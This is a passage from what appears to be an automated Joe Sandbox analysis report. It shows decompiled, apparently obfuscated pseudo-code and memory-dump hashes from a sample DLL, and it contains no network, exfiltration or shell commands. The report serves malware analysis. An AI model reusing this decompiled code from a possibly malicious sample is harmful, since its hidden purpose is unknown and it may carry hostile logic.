                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
                          • Instruction ID: 84097bf3fd3613fd911c297536d25ad25f605a1e44160b9f77095933a4e12438
                          • Opcode Fuzzy Hash: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
                          • Instruction Fuzzy Hash: C6E1FA72E14A9986EF10CF95E8406757BA9FB69BC1F068432EA4C47768DF3CE611DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00007FF87FF88C071520(intOrPtr __eax, long long __rbx, signed int __rdx, void* __r8, void* __r9, long long _a8, intOrPtr _a16, signed int _a24, signed long long _a32, signed long long _a40, signed int _a48, signed long long _a56, intOrPtr _a72, intOrPtr _a80) {
                          				signed int _t220;
                          				signed int _t222;
                          				signed char _t248;
                          				signed char _t268;
                          				intOrPtr _t296;
                          				signed long long _t298;
                          				intOrPtr _t300;
                          				signed long long _t302;
                          				signed long long _t304;
                          				signed long long _t307;
                          				intOrPtr _t309;
                          				intOrPtr _t310;
                          				intOrPtr _t313;
                          				signed long long _t316;
                          				signed long long _t317;
                          				signed long long _t319;
                          				intOrPtr _t321;
                          				signed long long _t322;
                          				intOrPtr _t323;
                          				signed long long _t324;
                          				signed long long _t328;
                          				signed long long _t330;
                          				signed long long _t333;
                          				intOrPtr _t334;
                          				signed long long _t341;
                          				signed long long _t345;
                          				intOrPtr _t350;
                          				intOrPtr _t353;
                          				signed long long _t354;
                          				signed long long _t359;
                          				intOrPtr* _t363;
                          				unsigned long long _t365;
                          				signed int _t368;
                          				long long _t370;
                          				signed long long _t373;
                          				signed long long _t379;
                          				signed long long _t381;
                          				void* _t382;
                          				signed long long _t383;
                          				signed long long _t384;
                          				signed long long _t389;
                          				signed long long _t390;
                          				intOrPtr _t393;
                          				intOrPtr* _t394;
                          
                          				_a8 = __rbx;
                          				 *0x8c0b4168 =  *0x8c0b4168 + 1;
                          				_t383 =  *0x8c0b41a0; // 0x0
                          				_t368 =  *0x8c0b4124;
                          				_t333 = _a56;
                          				_t384 = _t383 + 1;
                          				_t394 = _a48;
                          				_t393 = _a80;
                          				_a16 = __eax;
                          				_a24 =  *0x8c0b4130 & 0x0000ffff;
                          				_t296 =  *0x8c0b4138; // 0x0
                          				 *0x8c0b41a0 = _t384;
                          				 *0x8c0b4194 =  *0x8c0b4194 + 1;
                          				_t359 =  *(_t394 + 0x7f50) |  *0x8c0b4180;
                          				_t298 =  *(_t296 + 0xc410) ^ 0x000016b3;
                          				_a32 = _t298;
                          				_a48 =  *(_t333 + 0x1505) & 0x000000ff;
                          				 *0x8c0b4198 = _t298;
                          				 *(_t393 + _t384 * 8) = __rdx * 0x12f6;
                          				_t379 =  *0x8c0b41a0; // 0x0
                          				_t370 =  *0x8c0b4158; // 0x0
                          				_t300 =  *0x8c0b4188; // 0x0
                          				r10d =  *0x8c0b4132 & 0x000000ff;
                          				 *0x8c0b41a0 = _t379 - 1;
                          				 *0x8c0b4190 =  *0x8c0b4190 & 0x0000ffff &  *(_t300 + _t384 * 4);
                          				 *0x8c0b4158 = _t370 - 1;
                          				_t302 =  *0x8c0b4140; // 0x0
                          				 *0x8c0b41a0 = _t359;
                          				_t381 = _t359;
                          				_t334 = _a72;
                          				if (( *(_t333 + 0xeac) & 0x000000ff) -  *((intOrPtr*)(_t302 + 0x7864)) <= 0) goto 0x8c0716b5;
                          				 *(__r8 +  *0x8c0b4148 * 8) =  *(__r8 +  *0x8c0b4148 * 8) ^ ( *0x8c0b4148 - 0x00000ef1 | _t302);
                          				_t304 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b4132 = ( *0x8c0b4132 & 0x000000ff) * (( *(_t368 +  *0x8c0b4148 * 8) & 0x000000ff) +  *((intOrPtr*)(__r9 + 0x3e10)) & 0x000000ff);
                          				 *(__r8 + (_t304 + _t304) * 8) =  *(__r8 + (_t304 + _t304) * 8) ^ 0x00000001;
                          				goto 0x8c07180e;
                          				if (0xc20 % _a48 - 0x10cd > 0) goto 0x8c07175a;
                          				r12d = 0xffff;
                          				 *((intOrPtr*)(_t334 +  *0x8c0b4148 * 2)) =  *((intOrPtr*)(_t334 +  *0x8c0b4148 * 2)) + ( *(_t368 + _t381 * 4) & 0x0000ffff) +  *0x8c0b4150 - 0x2cf;
                          				 *0x8c0b4150 =  *0x8c0b4150 - 1;
                          				_t341 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b416c = 0x141c;
                          				 *0x8c0b4130 = ( *0x8c0b4130 & 0x0000ffff) + r12w;
                          				_t307 =  *0x8c0b4128; // 0x0
                          				 *((short*)(0x646 + _t341 * 4)) = _t307 / (_t341 + _t341);
                          				goto 0x8c071819;
                          				_t309 =  *0x8c0b4178; // 0x0
                          				_t373 =  *0x8c0b4198; // 0x0
                          				if (( *0x8c0b4132 & 0x000000ff) ==  *((intOrPtr*)(_t309 + __rdx * 2))) goto 0x8c071784;
                          				if (_t309 == _t373) goto 0x8c0717a3;
                          				_t310 =  *0x8c0b4138; // 0x0
                          				if ( *((intOrPtr*)(_t394 +  *0x8c0b4148 * 8)) ==  *((intOrPtr*)(_t310 + 0xea38))) goto 0x8c071ac0;
                          				 *(__r9 + _t384 * 8) =  *0x8c0b4124 *  *0x8c0b4180;
                          				_t363 =  *0x8c0b4124 +  *0x8c0b4160;
                          				 *_t363 = (sil & 0xffffffff) * 0x3d -  *_t363;
                          				_t313 =  *0x8c0b4140; // 0x0
                          				 *((intOrPtr*)(_t313 +  *0x8c0b4124 * 4)) = 0x7ff;
                          				 *(_t393 + __rdx * 8) =  *(_t393 + __rdx * 8) *  *(_t393 + 0x4858);
                          				_t389 = __rdx + 1;
                          				 *(_t334 + 0x14 + _t389 * 4) =  *(_t334 + 0x14 + _t389 * 4) &  *0x8c0b4122 & 0x000000ff;
                          				r12d = 0xffff;
                          				 *0x8c0b4148 =  *0x8c0b4148 + 1;
                          				_t390 = _t389 + 1;
                          				_t316 = _a40;
                          				r8d = 0x79f;
                          				 *0x8c0b4132 =  *(_t316 + _t390 * 4) - (((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc) + ((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc >> 0x1f)) * 0x1bbf;
                          				_t345 = _t394 + _t316 * 8;
                          				 *_t345 = _t363;
                          				_t317 =  *0x8c0b41a8; // 0x0
                          				r15d = 0x7a3;
                          				_t365 =  *(_t394 + _t390 * 8) & _t345;
                          				 *(0x3d4 + _t317 * 8) = _t365;
                          				_t268 =  *(_t317 + _t317 + 0x63a) & 0x0000ffff;
                          				if (_t268 - 0x155e >= 0) goto 0x8c07193a;
                          				r9d = _t268;
                          				asm("o16 nop [eax+eax]");
                          				_t319 =  *0x8c0b41a0; // 0x0
                          				_t382 = _t381 + 1;
                          				 *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) =  *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) + (_t319 | _t381);
                          				_t321 =  *0x8c0b41a8; // 0x0
                          				 *((char*)( *_t394 + _t321)) = 0x28;
                          				 *0x8c0b4132 = ( *0x8c0b4132 & 0x000000ff) * 0x73;
                          				_t248 = ( *0x8c0b416c & 0x0000ffff) + r12w;
                          				 *0x8c0b416c = _t248;
                          				 *0x8c0b4133 =  *0x8c0b4133 + ( *(_a32 + _t365 * 4 + 4 - 4) & 0x000000ff | _t268 | _t248);
                          				if (_t268 + 1 - 0x155e < 0) goto 0x8c0718d0;
                          				_t322 =  *0x8c0b4170; // 0x0
                          				 *0x8c0b4150 =  *0x8c0b4150 | _t322;
                          				 *(__r8 + 8 + (_t390 + _t390) * 8) =  *(__r8 + 8 + (_t390 + _t390) * 8) | _t322;
                          				r9d =  *0x8c0b4148; // 0x0
                          				_t323 =  *0x8c0b4178; // 0x0
                          				r8d =  *(_t323 + (_t382 + _t382) * 2) & 0x0000ffff;
                          				_t220 =  *0x8c0b4124; // 0x0
                          				r8d = r8d ^ 0x00000877;
                          				_t350 =  *0x8c0b41a8; // 0x0
                          				r8d = r8d + _t220 + 0xfffff332;
                          				 *0x8c0b4124 = r8d;
                          				_t222 =  *(_t350 + 0xe81) & 0x000000ff;
                          				if (r10d - _t222 > 0) goto 0x8c0719af;
                          				if (_a16 - 0xc3e <= 0) goto 0x8c071a20;
                          				_t324 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b41a0 = _t324 + 1;
                          				 *0x8c0b4148 = _t222 /  *0x4794 * _t365 %  *0x8c0b414c - r9d;
                          				 *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) =  *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) + _t365 - (_t365 >> 7) * 0xbad;
                          				r8d =  *0x8c0b4124; // 0x0
                          				_t353 =  *0x8c0b41a8; // 0x0
                          				_t328 =  *0x8c0b41a0; // 0x0
                          				r9d =  *0x8c0b4132 & 0x000000ff;
                          				_t354 = _a56;
                          				 *0x8c0b41a0 = _t328 - 1;
                          				if (( *(_t382 + _t353) & 0x000000ff) != ( *(_t354 + _t328 * 4) & 0x000000ff)) goto 0x8c071a96;
                          				r8d = r8d + 1;
                          				 *0x8c0b4124 = r8d;
                          				_t330 =  *_t394;
                          				 *(__r8 + _t330 * 8) = _t354 ^ 0x00000045;
                          				 *0x8c0b41a0 =  *0x8c0b41a0 +  *((intOrPtr*)(0x1089 + _t330 * 4));
                          				return  *0x8c0b4132 & 0x000000ff;
                          			}















































                          0x7ff88c071520
                          0x7ff88c07152e
                          0x7ff88c071541
                          0x7ff88c071548
                          0x7ff88c07154b
                          0x7ff88c071550
                          0x7ff88c071553
                          0x7ff88c07155b
                          0x7ff88c071563
                          0x7ff88c07156e
                          0x7ff88c071572
                          0x7ff88c071579
                          0x7ff88c071587
                          0x7ff88c071594
                          0x7ff88c07159b
                          0x7ff88c0715a1
                          0x7ff88c0715ad
                          0x7ff88c0715bf
                          0x7ff88c0715d5
                          0x7ff88c0715d9
                          0x7ff88c0715e0
                          0x7ff88c0715ea
                          0x7ff88c0715f8
                          0x7ff88c071600
                          0x7ff88c071610
                          0x7ff88c071625
                          0x7ff88c071635
                          0x7ff88c07163c
                          0x7ff88c071643
                          0x7ff88c07164d
                          0x7ff88c071658
                          0x7ff88c071674
                          0x7ff88c07169b
                          0x7ff88c0716a5
                          0x7ff88c0716ab
                          0x7ff88c0716b0
                          0x7ff88c0716c8
                          0x7ff88c0716da
                          0x7ff88c0716f7
                          0x7ff88c0716fc
                          0x7ff88c071708
                          0x7ff88c07170f
                          0x7ff88c071723
                          0x7ff88c071732
                          0x7ff88c071751
                          0x7ff88c071755
                          0x7ff88c07175a
                          0x7ff88c071768
                          0x7ff88c071774
                          0x7ff88c071782
                          0x7ff88c071784
                          0x7ff88c07179d
                          0x7ff88c0717bc
                          0x7ff88c0717c7
                          0x7ff88c0717d7
                          0x7ff88c0717d9
                          0x7ff88c0717e7
                          0x7ff88c0717fa
                          0x7ff88c0717fe
                          0x7ff88c071808
                          0x7ff88c07180e
                          0x7ff88c071819
                          0x7ff88c07181f
                          0x7ff88c071822
                          0x7ff88c071827
                          0x7ff88c07184e
                          0x7ff88c07185c
                          0x7ff88c071868
                          0x7ff88c07186b
                          0x7ff88c071876
                          0x7ff88c071886
                          0x7ff88c07188d
                          0x7ff88c07189d
                          0x7ff88c0718ab
                          0x7ff88c0718b6
                          0x7ff88c0718c7
                          0x7ff88c0718d0
                          0x7ff88c0718ea
                          0x7ff88c0718ed
                          0x7ff88c0718f4
                          0x7ff88c0718fb
                          0x7ff88c071909
                          0x7ff88c071916
                          0x7ff88c07191a
                          0x7ff88c07192c
                          0x7ff88c071938
                          0x7ff88c07193a
                          0x7ff88c071944
                          0x7ff88c071952
                          0x7ff88c071957
                          0x7ff88c07196c
                          0x7ff88c071973
                          0x7ff88c071978
                          0x7ff88c07197e
                          0x7ff88c071985
                          0x7ff88c071991
                          0x7ff88c071994
                          0x7ff88c07199b
                          0x7ff88c0719a5
                          0x7ff88c0719ad
                          0x7ff88c0719af
                          0x7ff88c0719bb
                          0x7ff88c0719f3
                          0x7ff88c071a0f
                          0x7ff88c071a12
                          0x7ff88c071a19
                          0x7ff88c071a20
                          0x7ff88c071a27
                          0x7ff88c071a34
                          0x7ff88c071a40
                          0x7ff88c071a49
                          0x7ff88c071a52
                          0x7ff88c071a55
                          0x7ff88c071a60
                          0x7ff88c071a63
                          0x7ff88c071a71
                          0x7ff88c071a95

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                          • Instruction ID: b8682809d7224d93eb4d88bbc5f0c5ae06e0e949ab902f9c32664fbe2a0e70c9
                          • Opcode Fuzzy Hash: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                          • Instruction Fuzzy Hash: F6F18E72E08A5585EF04CF99E8905753BA5FBAABC1F054532DA8D8B368DF3CE251DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00007FF87FF88C0742A0(intOrPtr __ecx, long long __rbx, signed int __rdx, signed int __r9) {
                          				signed char _t181;
                          				signed int _t193;
                          				intOrPtr _t196;
                          				signed int _t202;
                          				signed int _t208;
                          				signed int _t219;
                          				signed int _t248;
                          				signed char _t253;
                          				signed int _t255;
                          				signed int _t266;
                          				signed long long _t272;
                          				intOrPtr _t299;
                          				signed long long _t300;
                          				signed long long _t303;
                          				signed long long _t304;
                          				signed long long _t305;
                          				signed long long _t306;
                          				signed long long _t308;
                          				signed long long _t309;
                          				intOrPtr _t312;
                          				signed long long _t313;
                          				intOrPtr _t314;
                          				signed long long _t318;
                          				signed long long _t320;
                          				signed long long _t321;
                          				signed long long _t322;
                          				intOrPtr _t324;
                          				void* _t331;
                          				signed long long _t347;
                          				signed long long _t348;
                          				signed long long _t355;
                          				signed long long _t356;
                          				signed long long _t357;
                          				void* _t361;
                          				signed long long* _t362;
                          				signed short* _t364;
                          				signed long long _t367;
                          				intOrPtr _t371;
                          				signed long long _t372;
                          				signed long long _t377;
                          				signed long long _t378;
                          				signed long long _t379;
                          				signed short* _t381;
                          				signed long long _t385;
                          				signed long long _t387;
                          				signed long long _t392;
                          				void* _t396;
                          				signed int* _t399;
                          				signed int* _t401;
                          
                          				 *((long long*)(_t361 + 0x18)) = __rbx;
                          				 *(_t361 + 0x20) = r9d;
                          				 *((intOrPtr*)(_t361 + 8)) = __ecx;
                          				_t362 = _t361 - 0x10;
                          				_t378 =  *0x8c0b41a0; // 0x0
                          				_t364 =  *0x8c0b4180; // 0x0
                          				r9d =  *0x8c0b4148; // 0x0
                          				_t381 = _t364;
                          				_t355 =  *0x8c0b4150; // 0x0
                          				r9d = r9d + 1;
                          				_t399 = _t362[0x12];
                          				_t356 = _t355 - 1;
                          				_t392 = _t362[0xe];
                          				_t396 = _t378 - _t362[0xf];
                          				 *0x8c0b4180 = _t364 - 1;
                          				 *0x8c0b4148 = r9d;
                          				r8d =  *(__r9 + __r9 * 2 + __rdx) & 0x000000ff;
                          				_t347 = 0x947 / r8d;
                          				 *0x8c0b4150 = _t356;
                          				_t357 = _t356 * _t378;
                          				r10d = _t362[0x13] & 0x000000ff;
                          				_t385 =  *(_t362[0x14] + 0x385c) *  *(_t362[0x10] + 0x1fe4);
                          				_t181 =  *0x8c0b4120 & 0x0000ffff;
                          				r8d = _t181 & 0x000000ff;
                          				 *0x8c0b4120 = _t181 + 0xffff;
                          				_t362[0xb] = _t385;
                          				 *0x8c0b416c = 0x1a65 % ( *0x8c0b416c & 0x0000ffff);
                          				 *(_t399 + r9d * 8) =  *(_t399 + r9d * 8) ^  *0x8c0b414c;
                          				_t299 =  *0x8c0b41a8; // 0x0
                          				 *_t362 = _t357;
                          				 *0x8c0b4134 =  *0x8c0b4134 & ( *(_t299 + 0x5de) & 0x000000ff) * r8d;
                          				 *((short*)(0x1f8a + _t392 * 2 * 2)) = 0x8dc / ( *(_t392 * 2 + 0x1f8a + _t392 * 2) & 0x0000ffff);
                          				_t248 =  *0x8c0b416c & 0x0000ffff;
                          				if (_t248 - ( *0x8c0b4123 & 0x000000ff) <= 0) goto 0x8c074472;
                          				_t367 = _t362[0x11];
                          				r9d = r10b & 0xffffffff;
                          				_t300 =  *0x8c0b4158; // 0x0
                          				 *0x8c0b4158 = _t300 * __r9;
                          				_t303 = _t367 -  *0x8c0b4170;
                          				 *0x8c0b4170 = _t303;
                          				 *((char*)(__rdx + _t367 * 2 + _t367)) = (r10b & 0xffffffff) -  *((intOrPtr*)(__rdx + _t367 * 2 + _t367));
                          				 *(_t357 + 0x38 + _t303 * 8) =  *(_t357 + 0x38 + _t303 * 8) | 0x00001a24;
                          				if (_t248 + 1 - ( *0x8c0b4123 & 0x000000ff) > 0) goto 0x8c074420;
                          				_t362[0xb] = _t385 + 1;
                          				_t304 =  *0x8c0b41a0; // 0x0
                          				r8d =  *(_t399 + 8 + _t304 * 8);
                          				if (r8d - 0x200 <= 0) goto 0x8c0744e8;
                          				asm("o16 nop [eax+eax]");
                          				_t305 =  *0x8c0b4128; // 0x0
                          				r8d = r8d + 1;
                          				 *((short*)(0x189a +  *_t399 * 2)) = ( *(_t305 + 0x33b8) & 0x0000ffff) -  *((intOrPtr*)(0x189a +  *_t399 * 2)) +  *0x8c0b4170;
                          				 *0x8c0b4150 =  *0x8c0b4150 & 0xfffff8cf;
                          				_t193 =  *0x8c0b414c; // 0x0
                          				_t331 = _t193 + _t193;
                          				 *((char*)(_t331 + __rdx)) = _t381[0xae4] & 0x000000ff;
                          				if (r8d - 0x200 > 0) goto 0x8c074490;
                          				_t196 =  *0x8c0b4124; // 0x0
                          				 *0x8c0b4124 = _t196 + 1;
                          				_t253 = _t381[_t305] & 0x0000ffff;
                          				if (_t253 == 0x1853) goto 0x8c074764;
                          				_t266 = _t362[0xd];
                          				_t387 = _t392;
                          				r13d = 0xb9f;
                          				r13d = r13d - _t266;
                          				_t362[0xd] = _t266 + 0x1853;
                          				r9d = 0x1e4a;
                          				_t306 =  *0x8c0b41a0; // 0x0
                          				_t308 = __rdx | 0x00000297;
                          				 *(_t306 * 8 + _t357) = _t308;
                          				_t202 =  *0x8c0b4148; // 0x0
                          				 *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) =  *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) & ( *0x8c0b4168 & 0x0000ffff) - r9w;
                          				_t309 = _t308 -  *0x8c0b4198;
                          				r8d =  *0x8c0b4132 & 0x000000ff;
                          				 *0x8c0b4198 = _t309;
                          				r8b = r8b & _t253;
                          				 *0x8c0b4132 = r8b;
                          				r8b = r8b + 1;
                          				_t208 =  *0x8c0b4134; // 0x0
                          				 *0x8c0b4132 = r8b;
                          				 *0x8c0b4134 = _t208 * ( *((intOrPtr*)(0x789210 + _t309 * 4)) + 0x102c);
                          				r13d = r13d - 1;
                          				 *((long long*)(_t396 + _t347 * 8)) = r13d -  *((intOrPtr*)(_t396 + _t347 * 8));
                          				if (r9d != _t253) goto 0x8c07467e;
                          				_t379 =  *0x8c0b414c;
                          				 *((short*)(_t381 + _t347 * 4)) = ( *(_t396 + _t379 * 8) & 0x0000ffff | _t253) -  *((intOrPtr*)(_t381 + _t347 * 4));
                          				_t312 =  *0x8c0b41a8; // 0x0
                          				 *(_t379 + _t312) =  *(_t379 + _t312) & 0x00000082;
                          				_t313 =  *0x8c0b414c;
                          				r9d = r9d + 1;
                          				 *((intOrPtr*)(_t362[0x10] + _t313 * 4)) = r9d -  *((intOrPtr*)(_t362[0x10] + _t313 * 4)) + _t253;
                          				_t314 =  *0x8c0b4140; // 0x0
                          				_t272 =  *0x8c0b4198; // 0x0
                          				 *(_t314 + (_t313 + _t313 * 2) * 4) =  *(_t314 + (_t313 + _t313 * 2) * 4) & _t272 + _t253 & 0x00000008;
                          				 *((short*)(_t381 - 2 +  *0x8c0b4168 * 2)) = ( *_t381 & 0x0000ffff) / (__rbx + 1);
                          				if (r9d == _t253) goto 0x8c0745f0;
                          				_t401 = _t362[0x12];
                          				r10d = _t362[0x13] & 0x000000ff;
                          				if ( *((intOrPtr*)(_t401 +  *0x8c0b4148 * 8)) - _t347 > 0) goto 0x8c074743;
                          				if ( *((long long*)(_t396 + __rdx * 8)) == 0x15be) goto 0x8c074743;
                          				_t362[0xe] = _t362[0xe] - 1;
                          				_t318 =  *0x8c0b4158; // 0x0
                          				 *(_t401 +  *_t401 * 8) =  *(_t401 +  *_t401 * 8) ^ _t318;
                          				 *0x8c0b4158 =  *0x8c0b4158 + 1;
                          				_t219 =  *0x8c0b4148; // 0x0
                          				_t320 =  *0x8c0b41a0; // 0x0
                          				 *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) =  *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) + _t219 + 0x28;
                          				_t348 = _t347 * _t320;
                          				_t321 =  *0x8c0b4138; // 0x0
                          				 *((long long*)(_t321 + __rdx * 8)) = 0xffffed8a;
                          				_t371 =  *0x8c0b4160; // 0x0
                          				 *(_t371 + _t387) =  ~( *(_t371 + _t387) & 0x000000ff) - (_t253 & 0x000000ff) * 0x1a;
                          				_t372 = _t362[0x14];
                          				asm("cdq");
                          				 *(_t372 + _t348 * 4) = 0x189b /  *(_t372 + _t348 * 4);
                          				 *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) =  *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) + _t321;
                          				r9d = 0x1e4a;
                          				if (_t253 + 1 != 0x1853) goto 0x8c074530;
                          				r13d = _t362[0xe];
                          				_t255 =  *0x8c0b416c & 0x0000ffff;
                          				_t377 = _t362[0xf];
                          				asm("cdq");
                          				r8d = _t255;
                          				 *((char*)(_t372 + _t377)) = (0x906 - _t255) % ( *(_t331 + _t377) & 0x000000ff);
                          				 *0x8c0b416c =  *0x8c0b416c + 0xffff;
                          				_t322 =  *0x8c0b4140; // 0x0
                          				asm("cdq");
                          				 *(_t322 + (_t321 + _t321 * 2) * 4) = 0x134f /  *(_t322 + (_t321 + _t321 * 2) * 4);
                          				 *0x8c0b4158 =  *0x8c0b4158 +  *((intOrPtr*)(0x1bcd + (_t322 + _t322 * 2) * 8));
                          				 *0x8c0b41a0 =  *0x8c0b41a0 | _t362[0xd] * 0x0000014e;
                          				 *(r13d + _t377) =  *(r13d + _t377) ^ ( *0x8c0b4170 & 0x000000ff | r10b);
                          				_t324 =  *0x8c0b41a8; // 0x0
                          				 *((char*)(_t324 + _t348)) = 0;
                          				return 0x152d;
                          			}




















































                          0x7ff88c0742a0
                          0x7ff88c0742a5
                          0x7ff88c0742aa
                          0x7ff88c0742b9
                          0x7ff88c0742bd
                          0x7ff88c0742c7
                          0x7ff88c0742d1
                          0x7ff88c0742d8
                          0x7ff88c0742e3
                          0x7ff88c0742ea
                          0x7ff88c0742ed
                          0x7ff88c0742f5
                          0x7ff88c0742f8
                          0x7ff88c074304
                          0x7ff88c074307
                          0x7ff88c07430e
                          0x7ff88c074321
                          0x7ff88c074332
                          0x7ff88c074363
                          0x7ff88c07436a
                          0x7ff88c07436e
                          0x7ff88c074377
                          0x7ff88c07437a
                          0x7ff88c074381
                          0x7ff88c074388
                          0x7ff88c074396
                          0x7ff88c0743a4
                          0x7ff88c0743b4
                          0x7ff88c0743b7
                          0x7ff88c0743be
                          0x7ff88c0743dd
                          0x7ff88c0743ee
                          0x7ff88c0743f7
                          0x7ff88c074407
                          0x7ff88c074409
                          0x7ff88c074411
                          0x7ff88c074420
                          0x7ff88c07442d
                          0x7ff88c074437
                          0x7ff88c07443e
                          0x7ff88c07444d
                          0x7ff88c074459
                          0x7ff88c07446b
                          0x7ff88c07446d
                          0x7ff88c074472
                          0x7ff88c074479
                          0x7ff88c074485
                          0x7ff88c074487
                          0x7ff88c074490
                          0x7ff88c07449d
                          0x7ff88c0744b6
                          0x7ff88c0744be
                          0x7ff88c0744c9
                          0x7ff88c0744d1
                          0x7ff88c0744dc
                          0x7ff88c0744e6
                          0x7ff88c0744e8
                          0x7ff88c0744f0
                          0x7ff88c0744f8
                          0x7ff88c074503
                          0x7ff88c074509
                          0x7ff88c07450d
                          0x7ff88c074510
                          0x7ff88c07451b
                          0x7ff88c074524
                          0x7ff88c074528
                          0x7ff88c074530
                          0x7ff88c074544
                          0x7ff88c07454e
                          0x7ff88c074552
                          0x7ff88c074568
                          0x7ff88c074575
                          0x7ff88c07457c
                          0x7ff88c074584
                          0x7ff88c07458b
                          0x7ff88c07458e
                          0x7ff88c074599
                          0x7ff88c0745a3
                          0x7ff88c0745b2
                          0x7ff88c0745b9
                          0x7ff88c0745c2
                          0x7ff88c0745c9
                          0x7ff88c0745d7
                          0x7ff88c0745e2
                          0x7ff88c0745fd
                          0x7ff88c074602
                          0x7ff88c074609
                          0x7ff88c074611
                          0x7ff88c074621
                          0x7ff88c074626
                          0x7ff88c074634
                          0x7ff88c07463f
                          0x7ff88c07464d
                          0x7ff88c07465f
                          0x7ff88c074667
                          0x7ff88c074669
                          0x7ff88c074675
                          0x7ff88c074689
                          0x7ff88c074697
                          0x7ff88c0746a0
                          0x7ff88c0746a8
                          0x7ff88c0746af
                          0x7ff88c0746b2
                          0x7ff88c0746c5
                          0x7ff88c0746df
                          0x7ff88c0746ed
                          0x7ff88c0746f1
                          0x7ff88c0746f5
                          0x7ff88c0746fc
                          0x7ff88c074704
                          0x7ff88c07471a
                          0x7ff88c074723
                          0x7ff88c07472b
                          0x7ff88c074733
                          0x7ff88c07473e
                          0x7ff88c074748
                          0x7ff88c074754
                          0x7ff88c07475f
                          0x7ff88c074764
                          0x7ff88c074770
                          0x7ff88c07477c
                          0x7ff88c07477d
                          0x7ff88c07478c
                          0x7ff88c074790
                          0x7ff88c07479f
                          0x7ff88c0747af
                          0x7ff88c0747b3
                          0x7ff88c0747c7
                          0x7ff88c0747e0
                          0x7ff88c0747ed
                          0x7ff88c0747f1
                          0x7ff88c0747f8
                          0x7ff88c074810

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                          • Instruction ID: 7bd2839f94f3d4edf2756fd0113fc3291e1af8519710d0be1baa23151813f06e
                          • Opcode Fuzzy Hash: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                          • Instruction Fuzzy Hash: 02E1E732A19A91C5EB14CF59E8402797FA5FB6ABC5F064136DA8C8B768DF3CD241DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E00007FF87FF88C076820(long long __rbx, void* __rcx, void* __rdx, long long __rbp, signed int* __r9, void* __r10, void* __r11, long long __r12, signed int _a8, long long _a16, long long _a24, long long _a32, signed int _a40, signed int _a56, signed int _a64, signed int _a72) {
                          				void* _v40;
                          				signed int _v48;
                          				signed int _v56;
